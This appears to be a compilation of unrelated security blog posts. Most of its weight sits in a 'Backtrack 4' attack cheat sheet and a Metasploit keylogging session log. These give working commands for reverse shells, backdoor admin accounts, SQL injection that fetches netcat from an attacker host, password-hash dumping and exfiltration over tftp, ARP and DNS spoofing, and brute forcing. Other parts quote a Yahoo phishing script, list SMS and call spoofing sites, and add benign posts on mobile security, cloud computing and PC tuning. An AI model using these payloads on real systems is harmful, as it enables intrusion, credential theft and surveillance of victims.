This confuses the server to, email you the persons password.

All that is required is that you copy that script exactly!

Here is an example:

window.open(“http://www.eliteskills.com/”,null,”height=500,width=800,status=no,toolbar=yes,menubar=yes,location=yes, scrollbars=yes”); var return = bob@yahoo.com;

var enterpass = drowssap;

Fcn7662Nc2A_md5encryp_get_pass(joe14469);

In a matter of minutes you will have joe14469’s password!

How it works:

The program normally would read your login name find your password with functions setup by yahoo and re-email it to you. This time you are the one writing the message so you can manipulate the arguments of the functions. The code above resets the original variables in the function to alter the route of the sent password and user who queries the server. Basically it’s as if they sent the request for their password but it logs you in as the receiver. This is intended to be used only by system administrators to ban users or to bust illegal porn and drug sites. This is a first hand source and should not be used for illegal purposes other than password recovery of your own account. Any unlawful activity is your own responsibility and no one else. Note that if incorrectly sent (either login or syntax) the message is not replied to and due to the thousands of E-mails sent to the address each day it’s not moderated by an administrator.

Well, this much of texts are enough to motivate anyone to send his/her password to the hacker. If you read carefully the hacker is trying to make the victim send his/her password emailed to the hacker E-mail ID (retrieve_pwd_yh@yahoo.co.uk). But its very clear to all the readers, yahoo doesn’t have any such mechanism to retrieve the password. So, don’t get trapped into such dirty games. This is not the only way of Social Engineering to hack email passwords. There are several such means where the hacker will try to motivate the victim.

A Report On Backtrack 4

Table of Contents:
I. Networking
II. Services
III. Basics
IV. Foot printing
V. Scanning
VI. Windows Enumeration
VII. ARP Spoofing
VIII. Exploits
IX. Metasploit
What to do after gaining a remote shell
X. TFTP
XI. Netcat
XII. Passwords
XIII. Physical Access
XIV. SQL Injection
XV. Alternate Data Streams
XVI. A White Hat’s Pen Test
Networking:
dhcpcd :get a new IP address
Renew dynamic IP address:
dhcpcd -k :release IP address
ifconfig eth0 up :bring up the NIC
dhcpcd :get a new IP address
Static IP address:
ifconfig eth0 192.168.0.100/24 :set IP address & sub net mask
route add default gw 192.168.0.1 :set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf :set DNS server
Backtrack 4 config:
/etc/init.d/networking start :get a new ip address
/etc/init.d/wicd start :start wireless adapter
Services:
Apache server:
apachectl start start server on TCP port 80
apachectl stop stop server
SSH server:
sshd-generate generate ssh keys
/usr/sbin/sshd start server on TCP port 22
pkill sshd stop server
ssh user@targetIP
TFTP server:
atftpd –daemon –port 69 /tmp/ start server on UDP port 69 with a root directory of tmp
pkill tftpd stop server
VNC server:
Vncserver start server on TCP port 5901
pkill Xvnc stop server
Check what ports are listening:
netstat –ant show listening TCP ports
netstat –anu show listening UDP ports
netstat -ant | grep 22 verify ssh has started
netstat -anu | grep 69 verify tftp has started
Basics:
Mount a local hard drive:
mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1
Mount a Windows network share:
share
share admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share umount share
Edit a file:
nano test.sh create a new file and open it
x exit
Y save modified buffer
write changes
chmod 755 test.sh make the file executable
./test.sh run the file
Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom
Install a new program:
tar zxvf program.tar.gz
cd to the new program folder method 2: bzip2 -cd program.tar.bz2 | tar xvf -
./configure
make
su root
make install
Footprinting:
Whois:
whois target.com contact info, emails, dates, name servers
ping www.target.com IP address of web server
whois targetIP network range
DNS:
dig target.com any
A
PTR Host maps a domain to an IP address
NS Pointer maps an IP address to a domain
SOA name Server server name for a delegated zone
SRV start of authority zone transfer and record caching
MX service locator used to locate services in the network
host -l target.com zone transfer
Scanning:
scanrand -b10M targetIP:quick
nmap:
-sS TCP SYN scan or Stealth, half open (default)
-sT TCP full connect (very noisy)
-sU UDP scan
-PS SYN packet discovery (best against stateful firewalls)
-PA ACK packet discovery (best against stateless firewalls)
-PN don’t ping
-n no reverse DNS lookup
-A combines -O and -sV
-O OS fingerprinting
-sV service version (banner)
-p ports to scan (T:port,U:port)
-T timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL input list of hosts to scan
-oG grepable output to a file
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p open ports -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP
amap:
Take the results from nmap and check for services on uncommon ports.
amap -i scan.txt
OS Fingerprinting:
p0f -i eth0 -U –p use interface eth0, don’t display unknown signatures, promiscuous
point a browser to the targetIP read traffic on p0f
xprobe2 targetIP
Banner Grabbing:
nc targetIP port check if the port is open
nc 10.1.1.2 80
telnet targetIP port telnet may yield slightly different results
HEAD /HTTP/1.0
wget targetIP downloads the index.html file
cat index.html | more view file one page at a time, space bar for next page
q exit file
Windows Enumeration:
nmap -sS -p 139,445 targetIP
cd /pentest/enumeration/smb-enum
nbtscan -f targetIP check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP name, OS and workgroup
smbdumpusers -i targetIP list users
smbclient -L //targetIP list shares
Using Windows
net use \\targetIP\ipc$ “” /u:”" start a NULL session
net view \\targetIP view shares
smbclient:
smbclient -L hostName -I targetIP enumerate shares
smbclient -L hostName/share -U “” connect to open share with a blank user name
smbclient -L hostName -I targetIP -U admin connect to open share with user name admin
rpcclient:
rpcclient targetIP -U “” start a NULL session
netshareenum enumerate shares
enumdomusers enumerate users
lsaenumsid enumerate domain SIDs
queryuser RID user info, try 500, 501, 1000, 1001
createdomuser create user account
ARP Spoofing:
ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines under iptables.
Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this two times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0
dns spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.
Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing
Exploits:
cd /pentest/exploits/milw0rm
cat sploitlist.txt | grep -i [exploit]
Some exploits may be written for compilation under Windows, while others for Linux.
You can identify the environment by inspecting the headers.
cat exploit | grep “#include”
Windows: process.h, string.h, winbase.h, windows.h, winsock2.h
Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h
Grep out Windows headers, to leave only Linux based exploits:
cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u
Metasploit:
svn update update framework
Web Interface:
./msfweb open a browser to 127.0.0.1:55555
Console:
./msfconsole
help
show encoders,nops,exploits,payloads.auxillary
search
use
show options
set set RHOST 192.168.1.3
show payloads
set PAYLOAD
show options
set set LHOST 192.168.1.2
show targets
set TARGET set TARGET 0
exploit
Interactive sessions:
sessions –l list active sessions
sessions -i sessions -i 4, interact with session 4
sessions -k sessions -k 4, kill session 4
z background a session
c kill a session
Jobs list exploit jobs running
jobs –K kill all jobs
Auxiliary scanners:
show auxiliary
use
set
run
scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login
Payloads:
Attacker behind firewall: bind shell
Target behind firewall: reverse shell
Meterpreter
Automated:
db_import_nessus_nbe import Nessus results in NBE format
db_import_nmap_xml import nmap results in XML format (-oX)
cd /pentest/exploit/framework3
./msfconsole
load db_sqlite3
db_destroy pentest delete old database called pentest
db_create pentest create a new database call pentest
db_nmap targetIP run nmap through the framework and store results in database
db_hosts show hosts discovered
db_services show services running on each host
db_autopwn show options
db_autopwn -t -p –e select modules based on open ports, show matching exploits, exploit
Command Line Interface:
./msfcli | grep -i search for an exploit or auxiliary
./msfcli S summary info
./msfcli = PAYLOAD= E
Payload generator:
./msfpayload
S summary and options of payload
C C language
P Perl
y Ruby
R Raw, allows payload to be piped into msfencode and other tools
J JavaScript
X Windows executable
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe
Encode shellcode:
./msfencode
Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00′ -l
Choose the PexFnstenvMor encoder and format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘\x00′ -e PexFnstenvMor -t c
What to do after gaining a remote shell:
Hostname name of computer
net users list users
net user x hack /add add user “x” with password “hack”
net user x /add add user “x” with NO password
net localgroup list security groups
net localgroup administrators list users in Administrators group
net localgroup administrators x /add add user “x” to Administrators group
Don’t use interactive programs like FTP from a remote shell
TFTP:
attack box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/
target box
tftp -i 10.1.1.2 GET nc.exe
TFTP copies files with read only attributes. So to delete the file:
attrib -r nc.exe
del nc.exe
Netcat:
attacker: 10.1.1.1
target: 10.1.1.2
Port scanner:
nc -v -z 10.1.1.2 1-1024 scan ports 1 to 1024
Chat session:
target: nc -lvp 4444 start Netcat and listen verbosely on port 4444
attacker: nc -v 10.1.1.2 4444
Transfer file to target:
target: nc -lvp 4444 > output.txt
attacker: nc -v 10.1.1.2 4444 words
cat words | wc -l
About 306,000 passwords.
Brute force:
ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp
pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3
snmp
hydra -P words -v targetIP snmp
Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP
WYD:
Use wget to download specific files.
wget -r www.target.com –accept=pdf -f switch will read pwdump files
wyd.pl -o output.txt www.target.com/
cat output.txt | more
SAM file:
%SYSTEMROOT%/system32/config
%SYSTEMROOT%/repair backup copy not locked by the OS
Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x Where x is Channel created
C:\WINDOWS\system32> pwdump \\127.0.0.1
John the Ripper:
Paste the hashes into a new file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt
Rainbow Tables:
rcrack *.rt -f hash.txt
Physical Access:
Mount a NTFS share in read/write mode:
Boot your box with Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1
Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt
Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password. *
Do you really wish to change it? y
Write hive files? y
unmount /mnt/sda1
reboot
SQL Injection:
nmap -sS -p 1521 targetIP oracle
nmap -sS -p T:1433,U:1434 targetIP ms sql
Release Version of SqlServer.exe
SQL Server 2000 RTM 2000.80.194.0
SQL Server 2000 SP1 2000.80.384.0
SQL Server 2000 SP2 2000.80.534.0
SQL Server 2000 SP3 2000.80.760.0
SQL Server 2000 SP3a 2000.80.760.0
SQL Server 2000 SP4 2000.80.00.2039
SQL Server 2005 RTM 2005.90.1399
SQL Server 2005 SP1 2005.90.2047
SQL Server 2005 SP2 2005.90.3042
Authentication bypass:
‘ or 1=1– minus minus closes the SQL query, everything after it is ignored
Enumerating table names:
‘ having 1=1–
‘ group by table having 1=1–
‘ group by table, table2 having 1=1–
‘ group by table, table2, table3 having 1=1–
Enumerating column types:
union select sum(column) from table –
union select sum(column2) from table –
Adding data:
‘ ; insert into table values(‘value’,'value2′,’value3′)–
MS SQL stored procedure:
Output the database info into an html file, that you can view with a browser.
‘ ; exec sp_makewebtask “c:\Inetpub\wwwroot\test.html”, “select * from table” ; –
www.target.com/test.html
Run ipconfig on target and write to a file, that you can view with a browser.
‘ or 1=1; exec master..xp_cmdshell ‘ “ipconfig” > c:\Inetpub\wwwroot\test.txt’ ;–
www.target.com/test.txt
Upload netcat and spawn a reverse shell.
‘ or 1=1; exec master..xp_cmdshell ‘ “tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe’ ; –
attacker: nc -lvp 53
Alternate Data Streams:
Hide netcat inside a text file. Note netcat must be located in the current directory.
echo “This is a test” > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
start ./test.txt:nc.exe
A White Hat’s Pen Test by Muts:
nslookup
set type=ns
set type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum
Solarwinds
tftp the router config file
Use a perl script to decrypt the passwords
Find internal mail server in config file.
nc -n internalserver.com 80
Edit config file to open more port on the router, 135,139,445,1000
Use Metasploit to send RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1>hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes with rainbow table.
Use Remote Desktop to connect to server

NETWORK SECURITY TIPS(How to achieve Smartphone/Mobile Security in the enterprise)

Smart-phones have quickly become yet another indispensable part of modern business. Features such as wireless email, Web browsing, personal information management and network access to corporate resources allow for quicker and better decision making and greater productivity.
However, according to a 2008 survey conducted by marketing research provider Decipher Inc., 70% of respondents said they accessed sensitive information on their smart-phone device when away from the office, and therefore outside the confines of their organization’s secure environment.
This latest extension of the enterprise IT infrastructure has quickly turned from asset to risk. To make the most of the smart-phone’s undoubted benefits, it is important to address smart-phone and mobile security, safeguarding the information stored on any mobile device, just as you would with a laptop.
The essentials of a smartphone, mobile security policy
This means your mobile security policy needs to mandate:
• Device passwords with a minimum length, complexity and update frequency.
• Data encryption, depending on its sensitivity or classification level.
• Password-protected inactivity timeouts.
• No access to read-only parameters.
• Limited access to riskier features, such as Bluetooth and instant messaging.
It is also recommended only allowing voice calls on any device that is locked. And before allowing smartphones within the enterprise, ensure they can be wiped remotely if lost or stolen.

One area that has been seen as frustrating and complex by users and administrators alike has been setting up a VPN connection on a smartphone. End-to-end encryption from the smartphone, over the transport medium, to corporate resources is essential to prevent over-the-air data leakage, and thankfully vendors are upgrading products to make the whole process far easier.
Network security company Astaro Corp. claims its users can now set up and use the iPhone’s IPsec VPN capabilities with no technical knowledge, while SSL VPNs from Sonicwall Inc. offer clientless remote access for smartphones.
The Mobile VPN in Microsoft’s System Center Mobile Device Manager also adds additional protection by authenticating both the device and user. If your mobile users, however, only need to access the odd application, such as Pocket Outlook and Microsoft Exchange, then you could look at encrypting the communication by sending POP and SMTP mail protocols over TLS without a full-blown VPN.
Depending on the nature of your mobile workers’ voice calls, you may want to consider using devices developed for the National Security Agency’s Secure Mobile Environment Portable Electronic Device (SME PED) program, like Sectéra Edge, a combination phone-PDA. Such devices are certified to protect wireless voice communications classified “Top Secret,” as well as restrict access to “Secret” email and websites. If this type of product is beyond your budget, Cellcrypt Mobile, from voice security provider Cellcrypt Ltd., offers end-to-end real-time encryption for BlackBerry smartphones without the need for specialised equipment. It operates on all major wireless networks, including 2G, 3G and Wi-Fi.
The key to a strong smartphone and mobile security policy is to make sure that any sensitive data that is accessed is protected in all forms. There are many places where it might be intercepted, so you need to have them all covered.
If data is encrypted on your database server, does it remain encrypted when it is transmitted to a smartphone, either through synchronisation, email or a Web app? If the user makes a call to discuss the data, does the conversation need to be encrypted? Can you execute a remote wipe if the device and its data are lost or stolen?
Smartphones are here to stay, so you have to commit to endpoint data protection. The mobile devices may be small, but they’re still Internet-connected computers, so don’t let them become a double-edged sword.

Remote Keylogging with Backtrack

Remote Keylogging

$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
— —- —-
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop…
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
This is a test of the keystroke logger <Comma> I am typing this inside of notepad.

PINOptics-A New Mobile security revolution!

What is PINoptic
How PINoptic Works
Instead of having a PIN or password, you have a series of pictures or icons that make up your ‘picture story password’. When you come to enter your picture story password, multiple pictures or icons are displayed beside discrete symbols (alphanumeric characters for instance). You enter the symbols that are related to your picture story password to gain access. Each time you are asked for your picture story password the pictures, icons or symbols will be in a different place meaning that you will be entering a one-time-password each time. This means that you are protected from hacking and/or ‘shoulder surfing’.
By increasing the number of symbols required for entry, security can be radically increased. For example a military grade application would require five sets of symbols to be entered.
Initial research and confirmation of concept has been completed by cognitive psychologists at the University of Sunderland which suggests very little additional cognitive load is placed on the end-user over existing alpha-numeric PIN and password systems.
For more Information comment us we will reply it.

Power Password : The Threat Inside

Most of us have heard the term “Administrative Passwords” these are the “Super Power Passwords” that sit behind every workstation – it’s the password that once you know it you have access to the network and have the power to change anything and everything and to watch exactly what everyone is up to.
Behind every PC lies a Super Power Password, when you forget your own personal password you rely on an IT person to log you back on.This is one of the biggest concerns that most organizations have – they just don’t know how many people know the Super Power Password. And so it creates big taboo.
So if you are the Chairman of a large corporation, everything you do can be watched and monitored by all those who know the Super Power Passwords. They’ll know..

• How much the CEO is being paid
• What his bonus is
• What websites he’s visiting
• Will be able to see his emails
• Find out about his personal affairs
• Know what’s happening to the share price way ahead of anyone else

In fact every bit of confidential information that is communicated or stored on the network you’ll be able to read if you know the Super Power Passwords !! They can indeed change or alter the entire course of the company !
A recent survey by Cyber-Ark into Super Power Passwords found that approximately one-half of all enterprises have more administrative passwords than individual ones and up to 42% of these super-powerful passwords are never changed ! What’s really worrying about these figures is that once you’ve got the super power password the chances are that even if you leave you’ll still be able to access the system as they just don’t get changed.
If you feel like being malicious towards the company the best way of destroying it is to use the super power password and you can do untold damage once you’re into the network. So next time you think of the IT guys  who do the techie stuff and little else think again – they’re really the big brother in your organization. If this scares you then think seriously about managing your administrative passwords and put in the right practices and policies so you know exactly who is in control.
In Microsoft Windows, if you want to reset the local “Administrator” password then do so:

• Either you can: Right-click on the icon “My Computer“, Select “Manage“, “Local Users and Groups“, “Users“, right-click on “Administrator” and “Set Password“.
• Or go to the web page http://cern.ch/Win/operations/SetClientLocalAdminPassword (Change Local Administrator Password For a Client PC).

What r Clouds… n What is *Cloud-Computing??

Cloud computing is a model for enabling convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. This cloud model promotes availability and is composed of five essential characteristics, three service models, and four deployment models.
Essential Characteristics:
On-demand self-service. A consumer can unilaterally provision computing capabilities, such as server time and network storage, as needed automatically without requiring human interaction with each service’s provider.
Broad network access. Capabilities are available over the network and accessed through standard mechanisms that promote use by heterogeneous thin or thick client platforms (e.g., mobile phones, laptops, and PDAs).
Resource pooling. The provider’s computing resources are pooled to serve multiple consumers using a multi-tenant model, with different physical and virtual resources dynamically assigned and reassigned according to consumer demand. There is a sense of location independence in that the customer generally has no control or knowledge over the exact location of the provided resources but may be able to specify location at a higher level of abstraction (e.g., country, state, or datacenter). Examples of resources include storage, processing, memory, network bandwidth, and virtual machines.
Rapid elasticity. Capabilities can be rapidly and elastically provisioned, in some cases automatically, to quickly scale out and rapidly released to quickly scale in. To the consumer, the capabilities available for provisioning often appear to be unlimited and can be purchased in any quantity at any time.
Measured Service. Cloud systems automatically control and optimize resource use by leveraging a metering capability at some level of abstraction appropriate to the type of service (e.g., storage, processing, bandwidth, and active user accounts). Resource usage can be monitored, controlled, and reported providing transparency for both the provider and consumer of the utilized service.
Service Models:
Cloud Software as a Service (SaaS). The capability provided to the consumer is to use the provider’s applications running on a cloud infrastructure. The applications are accessible from various client devices through a thin client interface such as a web browser (e.g., web-based email). The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, storage, or even individual application capabilities, with the possible exception of limited user-specific application configuration settings.
Cloud Platform as a Service (PaaS). The capability provided to the consumer is to deploy onto the cloud infrastructure consumer-created or acquired applications created using programming languages and tools supported by the provider. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, or storage, but has control over the deployed applications and possibly application hosting environment configurations.
Cloud Infrastructure as a Service (IaaS). The capability provided to the consumer is to provision processing, storage, networks, and other fundamental computing resources where the consumer is able to deploy and run arbitrary software, which can include operating systems and applications. The consumer does not manage or control the underlying cloud infrastructure but has control over operating systems, storage, deployed applications, and possibly limited control of select networking components (e.g., host firewalls).
Deployment Models:
Private cloud. The cloud infrastructure is operated solely for an organization. It may be managed by the organization or a third party and may exist on premise or off premise.
Community cloud. The cloud infrastructure is shared by several organizations and supports a specific community that has shared concerns (e.g., mission, security requirements, policy, and compliance considerations). It may be managed by the organizations or a third party and may exist on premise or off premise.
Public cloud. The cloud infrastructure is made available to the general public or a large industry group and is owned by an organization selling cloud services.
Hybrid cloud. The cloud infrastructure is a composition of two or more clouds (private, community, or public) that remain unique entities but are bound together by standardized or proprietary technology that enables data and application portability (e.g., cloud bursting for load-balancing between clouds).

Information Security…..Call Spoofing and Smishing

Information Security…..
I am not here to tell you what is the meaning of call spoofing or smishing.
Smishing — There are many sites from where you can send fake sms to anyone (if you are paying money to site for fake sms, it means you can be caught) this information is just for a educational purpose.
Sites are given below :-
www.fakemytext.com ; www.smsspoofing.com ; www.smstexter.com ; www.thesmszone.com
Smishing  Security/Counter Measure — If you will received any sms from bank or any organisation don’t trust that sms, or you can also confirm from that organisation that they have sent any message to your mobile or not.
– You can do Call Spoofing from these sites :-
www.crazycall.net ; www.bluffmycall.com
Call Spoofing Security/Counter Measure – ? there is no security against it .. actually i havent find any …

Information Security…HOW TO MAKE YOUR PC FASTER..

1. use registry cleaner : whenever there is a virus attack registry is one part of operating system which is most effected.
2 def rag your hard drive : this is one of the steps of trouble shooting which almost every one ignored. but if you def rag your hard drive data will be stored in a sequential way providing easy access to ram.
3 scan for ad ware/spy ware & virus : always use an updated anti virus to scan  once you start working.
4 adjust computer visual effect
5 always clean window temporary file : go to start/run/temp select all delete
4 increase virtual memory if required : use following path my computer/properties/advance/performance/advance/check virtual memory
5 even using all these steps your PC is still slow please increase your ram